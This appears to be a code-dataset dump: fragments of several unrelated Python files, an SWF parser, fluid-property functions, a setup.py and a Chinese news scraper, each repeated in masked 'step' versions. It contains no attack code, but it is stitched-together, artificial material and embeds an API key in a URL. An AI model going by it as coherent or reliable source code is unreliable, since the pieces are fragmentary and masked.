self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('filepath required')\n else:\n file = SWFFile(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python3\n\n\nimport sys\nimport os\nimport math\n\nimport tempfile\n\nimport zlib\nimport lzma\nimport struct\nimport bitstruct\n\n\n\n# a swf file unpacker and analyzer\n# majority of information taken from https://www.adobe.com/devnet/swf.html (version 19)\n# some additional information taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\n\n\nclass SWFFileUnpackingException(Exception):\n\t'''generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values'''\n\nclass SWFRect(object):\n\tdef __init__(self, xmin, xmax, ymin, ymax):\n\t\tself.xmin = xmin\n\t\tself.xmax = xmax\n\t\tself.ymin = ymin\n\t\tself.ymax = ymax\n\tdef __str__(self):\n\t\treturn 'SWFRect('+str(self.xmin)+','+str(self.xmax)+','+str(self.ymin)+','+str(self.ymax)+')'\n\n\ntagCodeTranslation = {\n\t0:'End',\n\t1:'ShowFrame',\n\t2:'DefineShape',\n\t4:'PlaceObject',\n\t5:'RemoveObject',\n\t6:'DefineBits',\n\t7:'DefineButton',\n\t8:'JPEGTables',\n\t9:'SetBackgroundColor',\n\t10:'DefineFont',\n\t11:'DefineText',\n\t12:'DoAction',\n\t13:'DefineFontInfo',\n\t14:'DefineSound',\n\t15:'StartSound',\n\t17:'DefineButtonSound',\n\t18:'SoundStreamHead',\n\t19:'SoundStreamBlock',\n\t20:'DefineBitsLossless',\n\t21:'DefineBitsJPEG2',\n\t22:'DefineShape2',\n\t23:'DefineButtonCxform',\n\t24:'Protect',\n\t26:'PlaceObject2',\n\t28:'RemoveObject2',\n\t32:'DefineShape3',\n\t33:'DefineText2',\n\t34:'DefineButton2',\n\t35:'DefineBitsJPEG3',\n\t36:'DefineBitsLossless2',\n\t37:'DefineEditText',\n\t39:'DefineSprite',\n\t41:'ProductInfo', # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\t43:'FrameLabel',\n\t45:'SoundStreamHead2',\n\t46:'DefineMorphShape',\n\t48:'DefineFont2',\n\t56:'ExportAssets',\n\t57:'ImportAssets',\n\t58:'EnableDebugger',\n\t59:'DoInitAction',\n\t60:'DefineVideoStream',\n\t61:'VideoFrame',\n\t62:'DefineFontInfo2',\n\t63:'DebugID', # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart\n\t64:'EnableDebugger2',\n\t65:'ScriptLimits',\n\t66:'SetTabIndex',\n\t69:'FileAttributes',\n\t70:'PlaceObject3',\n\t71:'ImportAssets2',\n\t73:'DefineFontAlignZones',\n\t74:'CSMTextSettings',\n\t75:'DefineFont3',\n\t76:'SymbolClass',\n\t77:'Metadata',\n\t78:'DefineScalingGrid',\n\t82:'DoABC',\n\t83:'DefineShape4',\n\t84:'DefineMorphShape2',\n\t86:'DefineSceneAndFrameLabelData',\n\t87:'DefineBinaryData',\n\t88:'DefineFontName',\n\t89:'StartSound2',\n\t90:'DefineBitsJPEG4',\n\t91:'DefineFont4',\n\t93:'EnableTelemetry',\n}\n\n\nclass SWFTag(object):\n\tdef __init__(self, code, length):\n\t\tself.code = code\n\t\tself.length = length\n\n\t\tself.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n\t\tif self.typeName == '!UNKNOWN!':\n\t\t\tprint('warning: unknown swf tag code: '+str(self.code))\n\tdef isEndTag(self):\n\t\treturn self.typeName == 'End'\n\tdef __str__(self):\n\t\treturn 'SWFTag(code='+str(self.code)+' \"'+self.typeName+'\", length='+str(self.length)+')'\n\n\nclass SWFFile(object):\n\tdef __init__(self, filepath):\n\t\tself.filepath = filepath\n\n\t\tself.compression = None\n\t\tself.version = None\n\t\tself.fileLength = None\n\t\tself.frameSize = None\n\t\tself.frameRate = None\n\t\tself.frameCount = None\n\n\t\tself.tags = []\n\n\t\tself.chunkSize = 16 * 4096\n\n\t\tself.load()\n\n\tdef load(self):\n\t\t'''loads the swf file at the filepath'''\n\t\tself.handle = open(self.filepath, 'rb')\n\n\t\tself.unpackHeader1()\n\t\tprint('signature:', self.signature)\n\t\tprint('version:', self.version)\n\t\tprint('fileLength:', self.fileLength)\n\n\t\tif self.compression != 'none':\n\t\t\tself.decompress()\n\n\t\tself.unpackHeader2()\n\n\t\tprint('frameSize:', self.frameSize)\n\t\tprint('frameRate:', self.frameRate)\n\t\tprint('frameCount:', self.frameCount)\n\n\t\tself.unpackTags()\n\t\tfor tag in self.tags:\n\t\t\tprint(tag)\n\t\t\tif tag.typeName == '!UNKNOWN!':\n\t\t\t\tprint('warning: unknown tag!')\n\n\n\tdef decompress(self):\n\t\t'''replaces the handle with a tempfile handle with all content decompressed'''\n\t\ttemp = tempfile.TemporaryFile('w+b')\n\t\tif self.compression == 'zlib':\n\t\t\tdecompressor = zlib.decompressobj()\n\t\telif self.compression == 'lzma':\n\t\t\tdecompressor = lzma.LZMADecompressor()\n\t\telse:\n\t\t\traise Exception(\"unknown compression algorithm: \"+self.compression)\n\t\tchunk = self.handle.read(self.chunkSize)\n\t\twhile len(chunk) > 0:\n\t\t\ttemp.write(decompressor.decompress(chunk))\n\t\t\tchunk = self.handle.read(self.chunkSize)\n\t\ttemp.seek(0)\n\t\tself.handle = temp\n\n\tdef unpackHeader1(self):\n\t\t'''unpacks the first 8 bytes of the header and figures out what compression there is'''\n\t\theader = self.handle.read(8)\n\t\tsignature, self.version, self.fileLength = struct.unpack('<3sBI', header)\n\n\t\tsignature = signature.decode('ascii')\n\t\tif signature == 'FWS':\n\t\t\tself.compression = 'none'\n\t\telif signature == 'CWS':\n\t\t\tself.compression = 'zlib'\n\t\telif signature == 'ZWS':\n\t\t\tself.compression = 'lzma'\n\t\telse:\n\t\t\traise SWFFileUnpackingException('unknown file signature: \"'+signature+'\"')\n\n\t\tself.signature = signature\n\n\tdef unpackHeader2(self):\n\t\t'''unpacks the rest of the header data that might have been compressed'''\n\t\tself.frameSize = self.unpackRect()\n\t\tself.frameRate, self.frameCount = struct.unpack('<HH', self.handle.read(4))\n\t\t# frameRate is an 8.8 float actually, but i'm not sure how to unpack that...\n\n\tdef unpackRect(self):\n\t\tdata = self.handle.read(1)\n\t\tsize, = bitstruct.unpack('u5', data)\n\t\tdata += self.handle.read(math.ceil((size * 4 - 3) / 8))\n\t\txmin, xmax, ymin, ymax = bitstruct.unpack('p5'+('s'+str(size))*4, data)\n\t\treturn SWFRect(xmin, xmax, ymin, ymax)\n\n\tdef unpackTags(self):\n\t\tsample = self.handle.read(2)\n\t\ttag = None\n\t\twhile len(sample) > 0:\n\t\t\tif tag is not None and tag.isEndTag():\n\t\t\t\tprint('warning: swf has tags after an end tag!')\n\t\t\tself.handle.seek(-2, os.SEEK_CUR)\n\t\t\ttag = self.unpackTag()\n\t\t\tself.tags.append(tag)\n\n\t\t\tsample = self.handle.read(2)\n\n\tdef unpackTag(self):\n\t\ttag = self.unpackTagHeader()\n\t\tself.handle.read(tag.length)\n\t\treturn tag\n\tdef unpackTagHeader(self):\n\t\tdata, = struct.unpack('<H', self.handle.read(2))\n\t\ttagCode = data >> 6\n\t\ttagLength = data & 0x3f\n\t\tif tagLength == 0x3f:\n\t\t\ttagLength, = struct.unpack('<I', self.handle.read(4))\n\t\treturn SWFTag(tagCode, tagLength)\n\n\n\n\ndef main():\n\tif len(sys.argv) < 2:\n\t\tprint('filepath required')\n\telse:\n\t\tfile = SWFFile(sys.argv[1])\n\n\nif __name__ == '__main__':\n\tmain()\n",
"step-ids": [
17,
18,
20,
22,
24
]
}
|
[
17,
18,
20,
22,
24
] |
#!/usr/bin/env python3
def GetDensity(T, P, config):
return P/(T*config["Flow"]["mixture"]["gasConstant"])
def GetViscosity(T, config):
if (config["Flow"]["mixture"]["viscosityModel"]["type"] == "Constant"):
viscosity = config["Flow"]["mixture"]["viscosityModel"]["Visc"]
elif (config["Flow"]["mixture"]["viscosityModel"]["type"] == "PowerLaw"):
viscosity = config["Flow"]["mixture"]["viscosityModel"]["ViscRef"]*(T/config["Flow"]["mixture"]["viscosityModel"]["TempRef"])**0.7
elif (config["Flow"]["mixture"]["viscosityModel"]["type"] == "Sutherland"):
viscosity = (config["Flow"]["mixture"]["viscosityModel"]["ViscRef"]*(T/config["Flow"]["mixture"]["viscosityModel"]["TempRef"])**1.5)*(config["Flow"]["mixture"]["viscosityModel"]["TempRef"]+config["Flow"]["mixture"]["viscosityModel"]["SRef"])/(T+config["Flow"]["mixture"]["viscosityModel"]["SRef"])
else:
assert False
return viscosity
|
normal
|
{
"blob_id": "0e47a7d9cd6809886674291d6a535dd18205a012",
"index": 5455,
"step-1": "<mask token>\n",
"step-2": "def GetDensity(T, P, config):\n return P / (T * config['Flow']['mixture']['gasConstant'])\n\n\n<mask token>\n",
"step-3": "def GetDensity(T, P, config):\n return P / (T * config['Flow']['mixture']['gasConstant'])\n\n\ndef GetViscosity(T, config):\n if config['Flow']['mixture']['viscosityModel']['type'] == 'Constant':\n viscosity = config['Flow']['mixture']['viscosityModel']['Visc']\n elif config['Flow']['mixture']['viscosityModel']['type'] == 'PowerLaw':\n viscosity = config['Flow']['mixture']['viscosityModel']['ViscRef'] * (T\n / config['Flow']['mixture']['viscosityModel']['TempRef']) ** 0.7\n elif config['Flow']['mixture']['viscosityModel']['type'] == 'Sutherland':\n viscosity = config['Flow']['mixture']['viscosityModel']['ViscRef'] * (T\n / config['Flow']['mixture']['viscosityModel']['TempRef']\n ) ** 1.5 * (config['Flow']['mixture']['viscosityModel'][\n 'TempRef'] + config['Flow']['mixture']['viscosityModel']['SRef']\n ) / (T + config['Flow']['mixture']['viscosityModel']['SRef'])\n else:\n assert False\n return viscosity\n",
"step-4": "#!/usr/bin/env python3\n\ndef GetDensity(T, P, config):\n return P/(T*config[\"Flow\"][\"mixture\"][\"gasConstant\"])\n\ndef GetViscosity(T, config):\n if (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"Constant\"):\n viscosity = config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"Visc\"]\n elif (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"PowerLaw\"):\n viscosity = config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"ViscRef\"]*(T/config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"])**0.7\n elif (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"type\"] == \"Sutherland\"):\n viscosity = (config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"ViscRef\"]*(T/config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"])**1.5)*(config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"TempRef\"]+config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"SRef\"])/(T+config[\"Flow\"][\"mixture\"][\"viscosityModel\"][\"SRef\"])\n else: \n assert False\n return viscosity\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from setuptools import setup
setup(
name='nodepool_harness',
version='0.1dev',
description='Nodepool harness',
packages=['nodepool_harness', 'statsd', 'apscheduler'],
install_requires=["PyYAML", "python-novaclient", "paramiko", "sqlalchemy"],
entry_points = {
'console_scripts': [
'nh-install-node = nodepool_harness.scripts:install_node',
]
}
)
|
normal
|
{
"blob_id": "61ff5fae02d18d51595e8050d97244574e7d8af1",
"index": 6419,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-3": "from setuptools import setup\nsetup(name='nodepool_harness', version='0.1dev', description=\n 'Nodepool harness', packages=['nodepool_harness', 'statsd',\n 'apscheduler'], install_requires=['PyYAML', 'python-novaclient',\n 'paramiko', 'sqlalchemy'], entry_points={'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node']})\n",
"step-4": "from setuptools import setup\n\n\nsetup(\n name='nodepool_harness',\n version='0.1dev',\n description='Nodepool harness',\n packages=['nodepool_harness', 'statsd', 'apscheduler'],\n install_requires=[\"PyYAML\", \"python-novaclient\", \"paramiko\", \"sqlalchemy\"],\n entry_points = {\n 'console_scripts': [\n 'nh-install-node = nodepool_harness.scripts:install_node',\n ]\n }\n)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import sxtwl
import datetime
from datetime import date
import lxml
from lxml import etree
# 日历中文索引
ymc = [u"十一", u"十二", u"正", u"二", u"三", u"四", u"五", u"六", u"七", u"八", u"九", u"十"]
rmc = [u"初一", u"初二", u"初三", u"初四", u"初五", u"初六", u"初七", u"初八", u"初九", u"初十", \
u"十一", u"十二", u"十三", u"十四", u"十五", u"十六", u"十七", u"十八", u"十九", \
u"二十", u"廿一", u"廿二", u"廿三", u"廿四", u"廿五", u"廿六", u"廿七", u"廿八", u"廿九", u"三十", u"卅一"]
# 日历库实例化
lunar = sxtwl.Lunar()
# 2.阳历转阴历
def china_lunar():
today = str(date.today())
today_list = today.split('-') # ['2019', '08', '08']
lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日
# 判断是否为润年
if (lunar_day.Lleap):
china_day = "农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
else:
china_day ="农历:{0}月{1}".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])
return today,china_day
import json
def morning_news():
news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'
response = requests.get(news_api)
print(dict(response.json()))
news_list = dict(response.json())
news = ''
m = 1
news_q=''
for i in news_list['newslist']:
img_url=''
if i['url'] == '':
img_url = i['imgsrc']
news = str(str(m)+":"+i['title']+"\n"+i['url']+img_url+"\n")
news_q += str(news)
m += 1
return news_q
def news_put():
news_spider_message = '【早间新闻】 '+china_lunar()[0]+" "+china_lunar()[1]+"\n"+morning_news()
return news_spider_message
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}
def NewYork_news(page=1):
society = 'https://cn.nytimes.com/society/{}/'.format(page)
response = requests.get(url=society,headers =headers )
mytree = lxml.etree.HTML(response.text)
title = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a')
news = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//p')
url = mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div/div/ul//h3/a/@href')
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介
#
# print(mytree.xpath('//*[@id="sectionWrapper"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接
newss_1 = ''
number = 1
for t in title:
newss = str(number)+":"+str_list(t.text) +'。'+'\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\n'+' 详情:'+'\n'+'\n'
newss_1 +=newss
number += 1
return newss_1
def NewYork_news_put(page=0):
news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+" "+china_lunar()[1]+"\n"+NewYork_news(page)
return news_spider_message
def str_list(t):
m=''
for i in list(t):
if i == '中':
china = 'Z'
m += china +'_'
else:
m += i + '_'
return m
|
normal
|
{
"blob_id": "e1d0648825695584d3ea518db961a9178ea0c66a",
"index": 50,
"step-1": "<mask token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<mask token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<mask token>\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-2": "<mask token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<mask token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-3": "<mask token>\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<mask token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-4": "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\nymc = [u'十一', u'十二', u'正', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九', u'十'\n ]\nrmc = [u'初一', u'初二', u'初三', u'初四', u'初五', u'初六', u'初七', u'初八', u'初九', u'初十',\n u'十一', u'十二', u'十三', u'十四', u'十五', u'十六', u'十七', u'十八', u'十九', u'二十',\n u'廿一', u'廿二', u'廿三', u'廿四', u'廿五', u'廿六', u'廿七', u'廿八', u'廿九', u'三十', u'卅一'\n ]\nlunar = sxtwl.Lunar()\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\nimport json\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n",
"step-5": "import requests\nimport sxtwl\nimport datetime\nfrom datetime import date\nimport lxml\nfrom lxml import etree\n# 日历中文索引\nymc = [u\"十一\", u\"十二\", u\"正\", u\"二\", u\"三\", u\"四\", u\"五\", u\"六\", u\"七\", u\"八\", u\"九\", u\"十\"]\nrmc = [u\"初一\", u\"初二\", u\"初三\", u\"初四\", u\"初五\", u\"初六\", u\"初七\", u\"初八\", u\"初九\", u\"初十\", \\\n u\"十一\", u\"十二\", u\"十三\", u\"十四\", u\"十五\", u\"十六\", u\"十七\", u\"十八\", u\"十九\", \\\n u\"二十\", u\"廿一\", u\"廿二\", u\"廿三\", u\"廿四\", u\"廿五\", u\"廿六\", u\"廿七\", u\"廿八\", u\"廿九\", u\"三十\", u\"卅一\"]\n\n# 日历库实例化\nlunar = sxtwl.Lunar()\n\n\n\n# 2.阳历转阴历\n\n\ndef china_lunar():\n today = str(date.today())\n\n today_list = today.split('-') # ['2019', '08', '08']\n lunar_day = lunar.getDayBySolar((int)(datetime.datetime.now().year), (int)(datetime.datetime.now().month), (int)(datetime.datetime.now().day)) # 输入年月日\n # 判断是否为润年\n if (lunar_day.Lleap):\n china_day = \"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day =\"农历:{0}月{1}\".format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today,china_day\n\n\nimport json\ndef morning_news():\n news_api = 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q=''\n for i in news_list['newslist']:\n img_url=''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m)+\":\"+i['title']+\"\\n\"+i['url']+img_url+\"\\n\")\n news_q += str(news)\n m += 1\n\n return news_q\n\ndef news_put():\n news_spider_message = '【早间新闻】 '+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'}\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society,headers =headers )\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a')[1].text) #这个是标题\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//p')[1].text) # 这个是简介\n #\n # print(mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div[2]/div/ul//h3/a/@href')[1]) # 这个是链接\n newss_1 = ''\n number = 1\n for t in title:\n\n newss = str(number)+\":\"+str_list(t.text) +'。'+'\\n'+' 概要:'+str_list(news[title.index(t)].text)+'。'+'\\n'+' 详情:'+'\\n'+'\\n'\n newss_1 +=newss\n number += 1\n\n return newss_1\n\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】'+china_lunar()[0]+\" \"+china_lunar()[1]+\"\\n\"+NewYork_news(page)\n\n return news_spider_message\n\ndef str_list(t):\n m=''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china +'_'\n else:\n\n m += i + '_'\n\n\n return m\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# Generated by Django 2.1.1 on 2019-11-20 12:34
